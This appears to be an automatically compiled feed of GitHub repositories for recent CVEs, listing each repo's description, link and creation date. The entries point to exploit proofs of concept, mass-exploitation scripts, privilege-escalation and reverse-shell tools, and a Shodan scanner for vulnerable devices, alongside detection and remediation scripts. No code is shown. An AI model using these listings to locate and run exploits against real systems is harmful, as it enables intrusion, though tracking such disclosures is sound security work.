**Minor changes were made to the CVE to make it compatible with Python 3.** : [hheeyywweellccoommee/cve-2019-7609-modified.py-etsqc](https://github.com/hheeyywweellccoommee/cve-2019-7609-modified.py-etsqc) create time: 2023-07-17T01:01:05Z

**Fuel CMS 1.4.1 - Remote Code Execution - Python 3.x** : [VitoBonetti/CVE-2018-16763](https://github.com/VitoBonetti/CVE-2018-16763) create time: 2023-07-16T20:40:45Z

**no description** : [Muhammad-Ali007/LocalPotato_CVE-2023-21746](https://github.com/Muhammad-Ali007/LocalPotato_CVE-2023-21746) create time: 2023-07-16T15:57:37Z

**PoC script for CVE-2023-20110 - Cisco Smart Software Manager On-Prem SQL Injection Vulnerability** : [redfr0g/CVE-2023-20110](https://github.com/redfr0g/CVE-2023-20110) create time: 2023-07-16T10:53:51Z

**no description** : [NyaMeeEain/CVE-2022-28171-POC](https://github.com/NyaMeeEain/CVE-2022-28171-POC) create time: 2023-07-16T07:30:22Z

**This is an emergency solution while Microsoft addresses the vulnerability.** : [zerosorai/CVE-2023-36884](https://github.com/zerosorai/CVE-2023-36884) create time: 2023-07-15T16:56:18Z

**no description** : [toanthang1842002/CVE-2021-40449](https://github.com/toanthang1842002/CVE-2021-40449) create time: 2023-07-15T15:17:46Z

**no description** : [toanthang1842002/CVE-2017-6074](https://github.com/toanthang1842002/CVE-2017-6074) create time: 2023-07-15T12:20:51Z

**no description** : [a2ure123/CVE-2023-30383](https://github.com/a2ure123/CVE-2023-30383) create time: 2023-07-15T08:43:41Z

**no description** : [Muhammad-Ali007/OutlookNTLM_CVE-2023-23397](https://github.com/Muhammad-Ali007/OutlookNTLM_CVE-2023-23397) create time: 2023-07-14T22:02:55Z

**no description** : [Pog-Frog/cve-2022-44268](https://github.com/Pog-Frog/cve-2022-44268) create time: 2023-07-14T17:46:15Z

**Heap-based buffer overflow in aswRdr.sys (aka the TDI RDR driver) in avast! Home and Professional 4.8.1356.0 allows local users to cause a denial of service (memory corruption) or possibly gain privileges via crafted arguments to IOCTL 0x80002024.** : [fengjixuchui/CVE-2009-4049](https://github.com/fengjixuchui/CVE-2009-4049) create time: 2022-07-10T05:53:43Z

**(1) IQVW32.sys before 1.3.1.0 and (2) IQVW64.sys before 1.3.1.0 in the Intel Ethernet diagnostics driver for Windows allows local users to cause a denial of service or possibly execute arbitrary code with kernel privileges via a crafted (a) 0x80862013, (b) 0x8086200B, (c) 0x8086200F, or (d) 0x80862007 IOCTL call.** : [gmh5225/CVE-2015-2291](https://github.com/gmh5225/CVE-2015-2291) create time: 2022-06-28T17:46:19Z

**Apache RocketMQ Arbitrary File Write Vulnerability Exploit** : [Malayke/CVE-2023-37582_EXPLOIT](https://github.com/Malayke/CVE-2023-37582_EXPLOIT) create time: 2023-07-14T12:22:45Z

**no description** : [CalfCrusher/CVE-2023-31852](https://github.com/CalfCrusher/CVE-2023-31852) create time: 2023-04-23T23:36:31Z

**no description** : [CalfCrusher/CVE-2023-31853](https://github.com/CalfCrusher/CVE-2023-31853) create time: 2023-04-23T23:32:31Z

**no description** : [CalfCrusher/CVE-2023-31851](https://github.com/CalfCrusher/CVE-2023-31851) create time: 2023-04-23T23:12:54Z

**CVE-2023-33592批量漏洞利用程序** : [Acous7icwav3/CVE-2023-33592](https://github.com/Acous7icwav3/CVE-2023-33592) create time: 2023-07-14T03:15:13Z

**POC for CVE-2023-28252** : [hheeyywweellccoommee/CVE-2023-28252-vseik](https://github.com/hheeyywweellccoommee/CVE-2023-28252-vseik) create time: 2023-07-12T18:00:34Z

**Root Cause Analysis of CVE-2022-4262.** : [bjrjk/CVE-2022-4262](https://github.com/bjrjk/CVE-2022-4262) create time: 2023-07-13T13:17:20Z

**Recent Campaign abusing CVE-2023-36884** : [deepinstinct/Storm0978-RomCom-Campaign](https://github.com/deepinstinct/Storm0978-RomCom-Campaign) create time: 2023-07-13T12:54:00Z

**Proof of concept for LabVIEW Web Server HTTP Get Newline DoS vulnerability** : [fauzanwijaya/CVE-2002-0748](https://github.com/fauzanwijaya/CVE-2002-0748) create time: 2023-07-13T07:24:06Z

**This is a Python3 script that demonstrates an exploit for a Blind SQL Injection vulnerability in WebERP version 4.15.** : [gustanini/CVE-2019-13292-WebERP_4.15](https://github.com/gustanini/CVE-2019-13292-WebERP_4.15) create time: 2023-07-13T04:03:44Z

**no description** : [d34dun1c02n/CVE-2023-31704](https://github.com/d34dun1c02n/CVE-2023-31704) create time: 2023-07-13T01:16:37Z

**Reflected XSS** : [d34dun1c02n/CVE-2023-31705](https://github.com/d34dun1c02n/CVE-2023-31705) create time: 2023-07-13T01:12:35Z

**Exploit and scanner for CVE-2023-3460** : [diego-tella/CVE-2023-3460](https://github.com/diego-tella/CVE-2023-3460) create time: 2023-07-11T20:15:20Z

**POC for CVE-2023-28252** : [Malwareman007/CVE-2023-28252](https://github.com/Malwareman007/CVE-2023-28252) create time: 2023-07-12T17:52:30Z

**SCTF 2023 kernel pwn && CVE-2023-3640** : [pray77/CVE-2023-3640](https://github.com/pray77/CVE-2023-3640) create time: 2023-06-20T06:21:04Z

**F5-BIG-IP Remote Code Execution Vulnerability CVE-2022-1388: A Case Study** : [SudeepaShiranthaka/F5-BIG-IP-Remote-Code-Execution-Vulnerability-CVE-2022-1388-A-Case-Study](https://github.com/SudeepaShiranthaka/F5-BIG-IP-Remote-Code-Execution-Vulnerability-CVE-2022-1388-A-Case-Study) create time: 2023-07-12T15:53:33Z

**The remediation script should set the reg entries described in https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36884 . The detection script checks if they exist. Provided AS-IS without any warrenty.** : [Maxwitat/CVE-2023-36884-Scripts-for-Intune-Remediation-SCCM-Compliance-Baseline](https://github.com/Maxwitat/CVE-2023-36884-Scripts-for-Intune-Remediation-SCCM-Compliance-Baseline) create time: 2023-07-12T14:13:20Z

**This project is a Python script that exploits the CVE-2023-24489 vulnerability in ShareFile. It allows remote command execution on the target server. The script supports both Windows and Linux (On testing) platforms, and it can be used to exploit individual targets or perform mass checking on a list of URLs.** : [adhikara13/CVE-2023-24489-ShareFile](https://github.com/adhikara13/CVE-2023-24489-ShareFile) create time: 2023-07-12T13:01:33Z

**CVE-2022-3904 MonsterInsights < 8.9.1 - Stored Cross-Site Scripting via Google Analytics** : [RandomRobbieBF/CVE-2022-3904](https://github.com/RandomRobbieBF/CVE-2022-3904) create time: 2023-07-12T09:51:32Z

**no description** : [ADSSA-IT/CVE-2023-35744](https://github.com/ADSSA-IT/CVE-2023-35744) create time: 2023-07-12T07:28:54Z

**CVE-2023-28121 - WooCommerce Payments < 5.6.2 - Unauthenticated Privilege Escalation [ Mass Add Admin User ]** : [rio128128/Mass-CVE-2023-28121-kdoec](https://github.com/rio128128/Mass-CVE-2023-28121-kdoec) create time: 2023-07-12T06:04:56Z

**CVE-2023-28121 - WooCommerce Payments < 5.6.2 - Unauthenticated Privilege Escalation [ Mass Add Admin User ]** : [im-hanzou/Mass-CVE-2023-28121](https://github.com/im-hanzou/Mass-CVE-2023-28121) create time: 2023-07-12T02:41:26Z

**PoC Exploit for CVE-2023-35803 Unauthenticated Buffer Overflow in Aerohive HiveOS/Extreme Networks IQ Engine** : [lachlan2k/CVE-2023-35803](https://github.com/lachlan2k/CVE-2023-35803) create time: 2023-07-10T19:58:22Z

**Python script that generates pfs payloads to exploit CVE-2022-4510** : [Kalagious/BadPfs](https://github.com/Kalagious/BadPfs) create time: 2023-07-11T20:55:58Z

**Search vulnerable FortiOS devices via Shodan (CVE-2023-27997)** : [TechinsightsPro/ShodanFortiOS](https://github.com/TechinsightsPro/ShodanFortiOS) create time: 2023-07-11T20:41:03Z

**no description** : [entr0pie/CVE-2023-27163](https://github.com/entr0pie/CVE-2023-27163) create time: 2023-07-11T18:08:05Z

**CVE-2022–24992** : [n0lsecurity/CVE-2022-24992](https://github.com/n0lsecurity/CVE-2022-24992) create time: 2023-07-11T14:26:58Z

**CVE-2023-3460** : [Fire-Null/CVE-2023-3460](https://github.com/Fire-Null/CVE-2023-3460) create time: 2023-07-11T13:44:18Z

**CVE-2023-3460** : [hheeyywweellccoommee/CVE-2023-3460-obgen](https://github.com/hheeyywweellccoommee/CVE-2023-3460-obgen) create time: 2023-07-11T13:01:05Z

**CVE-2023-3460** : [Fire-Null/CVE-2023-3460](https://github.com/Fire-Null/CVE-2023-3460) create time: 2023-07-11T12:44:51Z

**no description** : [asepsaepdin/CVE-2021-1732](https://github.com/asepsaepdin/CVE-2021-1732) create time: 2023-07-11T09:29:18Z

**Download Monitor <= 4.7.60 - Sensitive Information Exposure via REST API** : [RandomRobbieBF/CVE-2022-45354](https://github.com/RandomRobbieBF/CVE-2022-45354) create time: 2023-07-11T09:51:40Z

**CVE-2023-27372-SPIP-CMS-Bypass** : [izzz0/CVE-2023-27372-POC](https://github.com/izzz0/CVE-2023-27372-POC) create time: 2023-07-11T10:00:04Z

**no description** : [diabl0w/CVE-2022-22057_SM-F926U](https://github.com/diabl0w/CVE-2022-22057_SM-F926U) create time: 2023-07-10T22:55:02Z

**CVE-2023-2255 Libre Office** : [elweth-sec/CVE-2023-2255](https://github.com/elweth-sec/CVE-2023-2255) create time: 2023-07-10T20:54:56Z

**Directory Listing vulnerability in issabel-pbx 4.0.0-6 exposing application sensitive files** : [sahiloj/CVE-2023-37599](https://github.com/sahiloj/CVE-2023-37599) create time: 2023-07-10T16:34:22Z

**CSRF vulnerability in issabel-pbx v.4.0.0-6 to delete any new virtual fax of users** : [sahiloj/CVE-2023-37598](https://github.com/sahiloj/CVE-2023-37598) create time: 2023-07-10T16:30:34Z

**CSRF vulnerability in issabel-pbx 4.0.0-6 to delete any user group** : [sahiloj/CVE-2023-37597](https://github.com/sahiloj/CVE-2023-37597) create time: 2023-07-10T16:28:29Z

**CSRF vulnerability in issabel-pbx 4.0.0-6 to delete any user** : [sahiloj/CVE-2023-37596](https://github.com/sahiloj/CVE-2023-37596) create time: 2023-07-10T16:23:40Z

**no description** : [asepsaepdin/CVE-2021-4034](https://github.com/asepsaepdin/CVE-2021-4034) create time: 2023-07-10T08:05:17Z

**no description** : [asepsaepdin/CVE-2023-22809](https://github.com/asepsaepdin/CVE-2023-22809) create time: 2023-07-10T06:38:14Z

**no description** : [asepsaepdin/CVE-2021-3560](https://github.com/asepsaepdin/CVE-2021-3560) create time: 2023-07-10T04:26:13Z

**no description** : [sunichi/cve-2022-4543-wrapper](https://github.com/sunichi/cve-2022-4543-wrapper) create time: 2023-07-10T02:34:01Z

**Using CVE-2022-0847, "Dirty Pipe Exploit", to pop a reverse bash shell on a foreign machine.** : [joeymeech/CVE-2022-0847-Exploit-Implementation](https://github.com/joeymeech/CVE-2022-0847-Exploit-Implementation) create time: 2023-07-09T22:48:22Z

**A Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder.** : [VEEXH/Ghost-Path-Traversal-CVE-2023-32235-](https://github.com/VEEXH/Ghost-Path-Traversal-CVE-2023-32235-) create time: 2023-07-09T20:01:11Z

**POC for CVE-2023-34362 affecting MOVEit Transfer** : [Malwareman007/CVE-2023-34362](https://github.com/Malwareman007/CVE-2023-34362) create time: 2023-07-09T18:44:22Z

**Mass CVE-2023-3460.** : [yon3zu/Mass-CVE-2023-3460](https://github.com/yon3zu/Mass-CVE-2023-3460) create time: 2023-07-09T16:46:17Z

**no description** : [YongYe-Security/Chamilo_CVE-2023-34960-EXP](https://github.com/YongYe-Security/Chamilo_CVE-2023-34960-EXP) create time: 2023-07-09T11:24:33Z

**Local Privilege Escalation Exploit for CVE-2021-44731** : [deeexcee-io/CVE-2021-44731-snap-confine-SUID](https://github.com/deeexcee-io/CVE-2021-44731-snap-confine-SUID) create time: 2023-07-09T10:06:29Z

**no description** : [bthnrml/guncel-cve-2019-9053.py](https://github.com/bthnrml/guncel-cve-2019-9053.py) create time: 2023-07-09T08:50:38Z

**CVE-2023-35843 NocoDB 任意文件读取漏洞** : [b3nguang/CVE-2023-35843](https://github.com/b3nguang/CVE-2023-35843) create time: 2023-07-09T04:10:44Z

**no description** : [cxdxnt/CVE-2022-24715](https://github.com/cxdxnt/CVE-2022-24715) create time: 2023-07-08T23:22:28Z

**An issue in AVG AVG Anti-Spyware v.7.5 allows an attacker to execute arbitrary code via a crafted script to the guard.exe component** : [TraiLeR2/CVE-2023-36167](https://github.com/TraiLeR2/CVE-2023-36167) create time: 2023-07-08T20:40:05Z

**An issue in SlySoft Game Jackal Pro v.5.2.0.0 allows an attacker to execute arbitrary code via the server.exe component** : [TraiLeR2/CVE-2023-36166](https://github.com/TraiLeR2/CVE-2023-36166) create time: 2023-07-08T20:38:51Z

**An issue in MiniTool Partition Wizard ShadowMaker v.12.7 allows an attacker to execute arbitrary code and gain privileges via the SchedulerService.exe component.** : [TraiLeR2/CVE-2023-36165](https://github.com/TraiLeR2/CVE-2023-36165) create time: 2023-07-08T20:37:38Z

**An issue in MiniTool Partition Wizard ShadowMaker v.12.7 allows an attacker to execute arbitrary code via the MTAgentService component** : [TraiLeR2/CVE-2023-36164](https://github.com/TraiLeR2/CVE-2023-36164) create time: 2023-07-08T20:36:19Z

**Cross Site Scripting vulnerability in IP-DOT BuildaGate v.BuildaGate5 allows a remote attacker to execute arbitrary code via a crafted script to the mc parameter of the URL** : [TraiLeR2/CVE-2023-36163](https://github.com/TraiLeR2/CVE-2023-36163) create time: 2023-07-08T20:28:57Z

**rizin denial of service bug** : [ifyGecko/CVE-2023-30226](https://github.com/ifyGecko/CVE-2023-30226) create time: 2023-07-08T19:14:30Z

**Icinga Web 2 - Authenticated Remote Code Execution <2.8.6, <2.9.6, <2.10** : [cxdxnt/CVE-2022-24715](https://github.com/cxdxnt/CVE-2022-24715) create time: 2023-07-08T19:06:37Z

**Icinga Web 2 - Authenticated Remote Code Execution <2.8.6, <2.9.6, <2.10** : [hheeyywweellccoommee/CVE-2022-24715-crrxa](https://github.com/hheeyywweellccoommee/CVE-2022-24715-crrxa) create time: 2023-07-08T19:00:47Z

**This project crawls and stores CVE data since 2022 and share them via an REST API that allows users to query known vulnerabilities.** : [Finbek/CVE_APIs](https://github.com/Finbek/CVE_APIs) create time: 2023-06-29T08:57:09Z

**no description** : [lodi-g/CVE-2023-33668](https://github.com/lodi-g/CVE-2023-33668) create time: 2023-07-08T08:56:21Z

**"Shellshock" Vulnerability. Remote code execution in Apache with mod_cgi** : [JoaoPedroMoreira02/CVE-2014-6271](https://github.com/JoaoPedroMoreira02/CVE-2014-6271) create time: 2023-07-01T03:50:02Z

**no description** : [hansengentle/CVE-2023](https://github.com/hansengentle/CVE-2023) create time: 2023-07-07T20:16:50Z

**no description** : [sahiloj/CVE-2023-37189](https://github.com/sahiloj/CVE-2023-37189) create time: 2023-07-07T17:39:19Z

**no description** : [sahiloj/CVE-2023-37190](https://github.com/sahiloj/CVE-2023-37190) create time: 2023-07-07T17:26:42Z

**no description** : [sahiloj/CVE-2023-37191](https://github.com/sahiloj/CVE-2023-37191) create time: 2023-07-07T17:11:10Z

**no description** : [hheeyywweellccoommee/CVE-2023-2982-ugdqh](https://github.com/hheeyywweellccoommee/CVE-2023-2982-ugdqh) create time: 2023-07-07T09:01:26Z

**no description** : [rizqimaulanaa/CVE-2023-3460](https://github.com/rizqimaulanaa/CVE-2023-3460) create time: 2023-07-07T12:40:37Z

**no description** : [LoaiEsam37/CVE-2023-2982](https://github.com/LoaiEsam37/CVE-2023-2982) create time: 2023-07-07T08:25:38Z

**CVE-2023-32315-Openfire-Bypass** : [izzz0/CVE-2023-32315-POC](https://github.com/izzz0/CVE-2023-32315-POC) create time: 2023-07-07T07:48:24Z

**Achat 0.150 beta7 - Remote Buffer Overflow Rewrite for python3 for the PNPT course.** : [Zeppperoni/CVE-2015-1578](https://github.com/Zeppperoni/CVE-2015-1578) create time: 2023-07-07T02:16:15Z

**no description** : [fgsoftware1/CVE-2022-4611](https://github.com/fgsoftware1/CVE-2022-4611) create time: 2023-07-06T21:28:29Z

**no description** : [Phamchie/CVE-2022-4611](https://github.com/Phamchie/CVE-2022-4611) create time: 2023-07-06T16:40:08Z

**Detect CVE-2023-24488 Exploitation Attempts** : [NSTCyber/CVE-2023-24488](https://github.com/NSTCyber/CVE-2023-24488) create time: 2023-07-06T15:23:45Z

**LiquidPoll – Advanced Polls for Creators and Brands <= 3.3.68 - Missing Authorization via activate_addon** : [RandomRobbieBF/CVE-2023-36531](https://github.com/RandomRobbieBF/CVE-2023-36531) create time: 2023-07-06T08:55:42Z

**CVE-2023-24488 By codeb0ss** : [codeb0ss/cve-2023-24488](https://github.com/codeb0ss/cve-2023-24488) create time: 2023-07-06T03:07:09Z

**PoC of CVE-2023-32961** : [LOURC0D3/CVE-2023-32961](https://github.com/LOURC0D3/CVE-2023-32961) create time: 2023-07-06T02:37:29Z

**CVE-2022-43684** : [lolminerxmrig/CVE-2022-43684](https://github.com/lolminerxmrig/CVE-2022-43684) create time: 2023-07-05T20:53:42Z

**no description** : [cfielding-r7/poc-cve-2023-2868](https://github.com/cfielding-r7/poc-cve-2023-2868) create time: 2023-06-20T18:43:54Z

**Binwalk** : [hheeyywweellccoommee/CVE-2022-4510-yjrvc](https://github.com/hheeyywweellccoommee/CVE-2022-4510-yjrvc) create time: 2023-07-01T02:00:39Z

**This is a PoC for CVE-2023-27372 which spawns a fully interactive shell.** : [RSTG0D/CVE-2023-27372-PoC](https://github.com/RSTG0D/CVE-2023-27372-PoC) create time: 2023-07-05T14:41:03Z

**no description** : [hheeyywweellccoommee/CVE-2023-34599-xsddo](https://github.com/hheeyywweellccoommee/CVE-2023-34599-xsddo) create time: 2023-07-01T04:00:46Z

**no description** : [hheeyywweellccoommee/CVE-2023-34843-illrj](https://github.com/hheeyywweellccoommee/CVE-2023-34843-illrj) create time: 2023-07-01T03:01:38Z

**no description** : [hheeyywweellccoommee/CVE-2023-26258-lbalq](https://github.com/hheeyywweellccoommee/CVE-2023-26258-lbalq) create time: 2023-07-01T03:01:37Z

**no description** : [hheeyywweellccoommee/CVE-2023-34598-ghonc](https://github.com/hheeyywweellccoommee/CVE-2023-34598-ghonc) create time: 2023-07-01T03:01:36Z

**Exploit for CVE-2023-3460. Unauthorized admin access for Ultimate Member plugin < v2.6.7** : [gbrsh/CVE-2023-3460](https://github.com/gbrsh/CVE-2023-3460) create time: 2023-07-05T13:44:50Z

**PoC of CVE-2023-29439** : [LOURC0D3/CVE-2023-29439](https://github.com/LOURC0D3/CVE-2023-29439) create time: 2023-07-05T13:04:39Z

**CVE-2023-3269: Linux kernel privilege escalation vulnerability** : [lrh2000/StackRot](https://github.com/lrh2000/StackRot) create time: 2023-06-28T13:22:26Z

**CVE-2023-35829 Linux kernel before 6.3.2. A use-after-free was found in rkvdec_remove in drivers/staging/media/rkvdec/rkvdec.c.** : [apkc/CVE-2023-35829-poc](https://github.com/apkc/CVE-2023-35829-poc) create time: 2023-07-03T18:26:04Z

**VMware Fusion contains a local privilege escalation vulnerability. A malicious actor with read/write access to the host operating system can elevate privileges to gain root access to the host operating system.** : [hheeyywweellccoommee/CVE-2023-20871-poc-jbwbi](https://github.com/hheeyywweellccoommee/CVE-2023-20871-poc-jbwbi) create time: 2023-07-03T14:01:22Z

**CVE-2023-33246** : [Devil0ll/CVE-2023-33246](https://github.com/Devil0ll/CVE-2023-33246) create time: 2023-06-13T03:51:32Z

**CVE-2017-7921 EXPLOIT** : [krypton612/hikivision](https://github.com/krypton612/hikivision) create time: 2023-07-04T23:22:21Z

**POC for CVE-2023-24488** : [securitycipher/CVE-2023-24488](https://github.com/securitycipher/CVE-2023-24488) create time: 2023-07-04T18:02:50Z

**Proof of concept for CVE-2022-23614 (command injection in Twig)** : [4rtamis/CVE-2022-23614](https://github.com/4rtamis/CVE-2022-23614) create time: 2023-07-04T15:52:50Z

**This is the Updated Python3 exploit for CVE-2019-9053** : [im-suman-roy/CVE-2019-9053](https://github.com/im-suman-roy/CVE-2019-9053) create time: 2023-07-04T11:47:17Z

**Nexxt Router 15.03.06.60 Authentication Bypass and Remote Command Execution** : [yerodin/CVE-2022-46080](https://github.com/yerodin/CVE-2022-46080) create time: 2023-07-04T08:31:04Z

**CVE-2023-24488.rb The provided script is a Ruby script used to check and detect the CVE-2023-24488 security vulnerability in Citrix Gateway and Citrix ADC.** : [Abo5/CVE-2023-24488](https://github.com/Abo5/CVE-2023-24488) create time: 2023-07-04T00:29:56Z

**no description** : [nonamecoder/CVE-2023-22906](https://github.com/nonamecoder/CVE-2023-22906) create time: 2023-05-03T20:52:19Z

**PoC of Imagemagick's Arbitrary File Read** : [entr0pie/CVE-2022-44268](https://github.com/entr0pie/CVE-2022-44268) create time: 2023-07-03T18:13:44Z

**VMware Fusion contains a local privilege escalation vulnerability. A malicious actor with read/write access to the host operating system can elevate privileges to gain root access to the host operating system.** : [ChriSanders22/CVE-2023-20871-poc](https://github.com/ChriSanders22/CVE-2023-20871-poc) create time: 2023-07-03T13:31:46Z

**CVE-2023-35829 Linux kernel before 6.3.2. A use-after-free was found in rkvdec_remove in drivers/staging/media/rkvdec/rkvdec.c.** : [ChriSanders22/CVE-2023-35829-poc](https://github.com/ChriSanders22/CVE-2023-35829-poc) create time: 2023-06-22T08:09:53Z

**CVE-2023-28343** : [hba343434/CVE-2023-28343](https://github.com/hba343434/CVE-2023-28343) create time: 2023-07-03T11:48:21Z

**Python 2.7** : [Jenderal92/CHAMILO-CVE-2023-34960](https://github.com/Jenderal92/CHAMILO-CVE-2023-34960) create time: 2023-07-03T11:17:42Z

**no description** : [R0OtAdm1n/CVE-2021-26084-EXP](https://github.com/R0OtAdm1n/CVE-2021-26084-EXP) create time: 2023-07-03T07:31:29Z

**Fix WinVerifyTrust Signature Validation Vulnerability, CVE-2013-3900, QID-378332** : [CyberCondor/Fix-WinVerifyTrustSignatureValidationVuln](https://github.com/CyberCondor/Fix-WinVerifyTrustSignatureValidationVuln) create time: 2023-07-03T06:18:50Z

**Python 2.7** : [Jenderal92/WP-CVE-2023-32243](https://github.com/Jenderal92/WP-CVE-2023-32243) create time: 2023-07-03T04:16:16Z

**no description** : [Pari-Malam/CVE-2023-32315](https://github.com/Pari-Malam/CVE-2023-32315) create time: 2023-07-02T20:38:14Z

**Expoit for CVE-2022-44268** : [bhavikmalhotra/CVE-2022-44268-Exploit](https://github.com/bhavikmalhotra/CVE-2022-44268-Exploit) create time: 2023-07-02T17:24:00Z

**Linux kernel hbp exploit method demo. (i.e. the degradation version of CVE-2022-42703)** : [Squirre17/hbp-attack-demo](https://github.com/Squirre17/hbp-attack-demo) create time: 2023-07-02T10:58:46Z

**PoC** : [ewilded/CVE-2023-37250](https://github.com/ewilded/CVE-2023-37250) create time: 2023-07-02T05:37:51Z

**no description** : [andrenasx/CVE-2015-10034](https://github.com/andrenasx/CVE-2015-10034) create time: 2023-07-01T23:27:30Z

**no description** : [hheeyywweellccoommee/CVE-2015-10034-akdfu](https://github.com/hheeyywweellccoommee/CVE-2015-10034-akdfu) create time: 2023-07-01T22:00:45Z

**Reversing Citrix Gateway for XSS** : [k00kx/CVE-2023-24488](https://github.com/k00kx/CVE-2023-24488) create time: 2023-07-01T23:36:08Z

**no description** : [andrenasx/CVE-2015-10034](https://github.com/andrenasx/CVE-2015-10034) create time: 2023-07-01T21:06:55Z

**CVE-2023-24488 PoC** : [SirBugs/CVE-2023-24488-PoC](https://github.com/SirBugs/CVE-2023-24488-PoC) create time: 2023-07-01T17:47:17Z

**no description** : [0xyf77/CVE-2016-4655](https://github.com/0xyf77/CVE-2016-4655) create time: 2023-07-01T07:58:30Z

**no description** : [Imahian/CVE-2023-34599](https://github.com/Imahian/CVE-2023-34599) create time: 2023-07-01T03:07:26Z

**no description** : [Imahian/CVE-2023-34598](https://github.com/Imahian/CVE-2023-34598) create time: 2023-07-01T02:51:33Z

**no description** : [Imahian/CVE-2023-26258](https://github.com/Imahian/CVE-2023-26258) create time: 2023-07-01T02:41:31Z

**no description** : [Imahian/CVE-2023-34843](https://github.com/Imahian/CVE-2023-34843) create time: 2023-07-01T02:02:18Z

**Binwalk** : [Imahian/CVE-2022-4510](https://github.com/Imahian/CVE-2022-4510) create time: 2023-07-01T01:54:35Z

**no description** : [andrenasx/CVE-2015-10034](https://github.com/andrenasx/CVE-2015-10034) create time: 2023-06-30T16:51:43Z

**no description** : [hheeyywweellccoommee/CVE-2015-10034-posua](https://github.com/hheeyywweellccoommee/CVE-2015-10034-posua) create time: 2023-06-30T13:01:13Z

**no description** : [andrenasx/CVE-2015-10034](https://github.com/andrenasx/CVE-2015-10034) create time: 2023-06-30T12:59:16Z

**no description** : [hheeyywweellccoommee/CVE-2015-10034-Test-lazmv](https://github.com/hheeyywweellccoommee/CVE-2015-10034-Test-lazmv) create time: 2023-06-29T18:02:18Z

**spoolsv.exe arb file write poc** : [Y3A/cve-2020-1048](https://github.com/Y3A/cve-2020-1048) create time: 2023-06-30T11:36:10Z

**Decrypt reversible secrets encrypted using the default hardcoded key related to CVE-2020-9289 on FortiAnalyzer/FortiManager (the only difference with CVE-2019-6693 is the encryption routine).** : [synacktiv/CVE-2020-9289](https://github.com/synacktiv/CVE-2020-9289) create time: 2023-06-30T08:48:37Z

**CVE-2023-21707 EXP** : [N1k0la-T/CVE-2023-21707](https://github.com/N1k0la-T/CVE-2023-21707) create time: 2023-06-30T10:15:07Z

**OpenSSH 9.1漏洞大规模扫描和利用** : [H4K6/CVE-2023-25136](https://github.com/H4K6/CVE-2023-25136) create time: 2023-06-30T09:34:36Z

**WordPress社交登录和注册(Discord,Google,Twitter,LinkedIn)<=7.6.4-绕过身份验证** : [H4K6/CVE-2023-2982-POC](https://github.com/H4K6/CVE-2023-2982-POC) create time: 2023-06-30T09:15:02Z

**wof.sys race condition uaf read poc** : [Y3A/cve-2023-21766](https://github.com/Y3A/cve-2023-21766) create time: 2023-06-30T03:44:01Z

**no description** : [RupturaInfoSec/CVE-2023-26563-26564-26565](https://github.com/RupturaInfoSec/CVE-2023-26563-26564-26565) create time: 2023-06-10T13:33:33Z

**no description** : [andrenasx/CVE-2015-10034-Test](https://github.com/andrenasx/CVE-2015-10034-Test) create time: 2023-06-29T17:30:13Z

**no description** : [Hamesawian/CVE-2021-42013](https://github.com/Hamesawian/CVE-2021-42013) create time: 2023-06-29T16:32:44Z

**no description** : [xbz0n/CVE-2023-0830](https://github.com/xbz0n/CVE-2023-0830) create time: 2023-06-29T15:23:06Z

**WordPress Social Login and Register (Discord, Google, Twitter, LinkedIn) <= 7.6.4 - Authentication Bypass** : [RandomRobbieBF/CVE-2023-2982](https://github.com/RandomRobbieBF/CVE-2023-2982) create time: 2023-06-29T14:21:08Z

**no description** : [yangshifan-git/CVE-2021-1732](https://github.com/yangshifan-git/CVE-2021-1732) create time: 2023-06-29T12:23:51Z

**Linux kernel LPE practice with an NPD vulnerability** : [TurtleARM/CVE-2023-3338](https://github.com/TurtleARM/CVE-2023-3338) create time: 2023-06-29T10:12:18Z

**Using this tool, you can scan for remote command execution vulnerability CVE-2021-44228 on Apache Log4j at multiple addresses.** : [MrHarshvardhan/PY-Log4j-RCE-Scanner](https://github.com/MrHarshvardhan/PY-Log4j-RCE-Scanner) create time: 2023-06-29T07:46:40Z

**An exploit for the CVE-2022-22963 (Spring Cloud Function Vulnerability)** : [HenriVlasic/Exploit-for-CVE-2022-22963](https://github.com/HenriVlasic/Exploit-for-CVE-2022-22963) create time: 2023-06-29T04:04:50Z

**test** : [gysf666/CVE-2023-27997-test](https://github.com/gysf666/CVE-2023-27997-test) create time: 2023-06-29T03:03:04Z

**CVE-2018-25031 tests** : [mathis2001/CVE-2018-25031](https://github.com/mathis2001/CVE-2018-25031) create time: 2023-06-28T13:41:22Z

**no description** : [mdsecactivebreach/CVE-2023-26258-ArcServe](https://github.com/mdsecactivebreach/CVE-2023-26258-ArcServe) create time: 2023-06-28T13:51:27Z

**Formidable Forms < 6.3.1 - Subscriber+ Remote Code Execution** : [RandomRobbieBF/CVE-2023-2877](https://github.com/RandomRobbieBF/CVE-2023-2877) create time: 2023-06-28T10:34:08Z

**非常简单的CVE-2023-0386's exp and analysis.Use c and sh.** : [Fanxiaoyao66/CVE-2023-0386](https://github.com/Fanxiaoyao66/CVE-2023-0386) create time: 2023-06-28T07:49:52Z

**pentesterlab_CVE-2018-11235: Git Submodule RCE** : [theerachaich/lab](https://github.com/theerachaich/lab) create time: 2023-06-28T05:31:08Z

**Mod Python code for scanning CVE-2023-27997** : [blachart/CVE-2023-27997](https://github.com/blachart/CVE-2023-27997) create time: 2023-06-27T03:03:01Z

**no description** : [ps-interactive/lab_cve-2021-4034-polkit-emulation-and-detection](https://github.com/ps-interactive/lab_cve-2021-4034-polkit-emulation-and-detection) create time: 2023-06-27T23:06:02Z

**Public disclosure for CVE-2023-34843.** : [rootd4ddy/CVE-2023-34843](https://github.com/rootd4ddy/CVE-2023-34843) create time: 2023-06-27T20:45:32Z

**FreeSWITCH Exploit (CVE-2019-19492)** : [hheeyywweellccoommee/CVE-2019-19492-mbprp](https://github.com/hheeyywweellccoommee/CVE-2019-19492-mbprp) create time: 2023-05-24T01:02:12Z

**SPIP Vulnerability Scanner - CVE-2023-27372 Detector** : [tucommenceapousser/CVE-2023-27372](https://github.com/tucommenceapousser/CVE-2023-27372) create time: 2023-06-25T19:39:37Z

**NocoDB任意文件读取CVE-2023-35843** : [Szlein/CVE-2023-35843](https://github.com/Szlein/CVE-2023-35843) create time: 2023-06-27T16:14:54Z

**no description** : [fortra/CVE-2023-28252-](https://github.com/fortra/CVE-2023-28252-) create time: 2023-06-27T12:22:05Z

